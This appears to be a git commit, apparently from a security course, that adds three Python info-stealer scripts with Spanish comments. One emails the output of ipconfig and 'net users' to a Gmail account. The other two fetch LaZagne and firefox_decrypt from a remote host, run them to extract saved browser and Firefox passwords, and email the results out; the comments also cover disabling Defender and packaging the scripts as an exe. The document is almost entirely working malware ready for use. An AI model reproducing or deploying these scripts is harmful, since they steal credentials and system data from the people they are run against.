Add malware

This commit is contained in:
Manuel Vergara 2024-01-31 20:29:22 +01:00
parent 352889e2ba
commit 213a859a7d
5 changed files with 1502 additions and 0 deletions

View File

@ -0,0 +1,68 @@
#!/usr/bin/env python3
"""
Malware - Envío del resultado de comandos por correo
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
"""
import dotenv
import os
import subprocess
import smtplib
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850')
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte configurado
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
if __name__ == '__main__':
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
ipconfig_output = run_command("ipconfig")
# Primer correo
send_email(
"ipconfig INFO",
ipconfig_output,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
users_info = run_command("net users")
# Segundo correo
send_email(
"users INFO",
users_info,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)

View File

@ -0,0 +1,85 @@
#!/usr/bin/env python3
"""
Malware - LaZagne
LaZagne.exe https://github.com/AlessandroZ/LaZagne
Este virus no se puede ejecutar con el Windows Defender activado.
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y lo
enviará por correoç
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
"""
import dotenv
import os
import requests
import subprocess
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850')
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte configurado
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def download_and_execute_lazagne():
r = requests.get("http://192.168.1.120/LaZagne.exe")
temp_file = tempfile.mkdtemp()
os.chdir(temp_file)
with open("LaZagne.exe", "wb") as f:
f.write(r.content)
lazagne_output = run_command("LaZagne.exe browsers")
os.remove("LaZagne.exe")
return lazagne_output
if __name__ == '__main__':
output = download_and_execute_lazagne()
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"LaZagne Browser INFO",
output,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)

View File

@ -0,0 +1,129 @@
#!/usr/bin/env python3
# coding: cp850
"""
Malware - firefox_decrypt.py
Firefox Decrypt https://github.com/unode/firefox_decrypt
La construcción del ejecutables es con pyinstaller y se ejecuta así:
pyinstaller --oneline malware.py
Para que funcione el .exe se debe harcodear el password y no usar dotenv
"""
import dotenv
import os
import requests
import subprocess
import sys
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
try:
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850').strip()
except Exception as e:
print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")
return None
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte de teclas presionadas
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def get_firefox_profiles(username):
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
try:
profiles = [profile for profile in os.listdir(
path) if "release" in profile]
return profiles[0] if profiles else None
except Exception as e:
print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")
return None
def get_firefox_passwords(username, profiles):
r = requests.get("http://192.168.1.120/firefox_decrypt.py")
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with open("firefox_decrypt.py", "wb") as f:
f.write(r.content)
command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
passwords = run_command(command)
os.remove("firefox_decrypt.py")
return passwords
if __name__ == '__main__':
username_str = run_command("whoami")
username = username_str.split("\\")[1]
profiles = get_firefox_profiles(username)
if not username or not profiles:
sys.exit(
f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")
passwords = get_firefox_passwords(username, profiles)
if passwords:
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"Decrypted Firefox Passwords INFO",
passwords,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
else:
print(f"[!] No se han encontrado contraseñas")

File diff suppressed because it is too large Load Diff

Binary file not shown.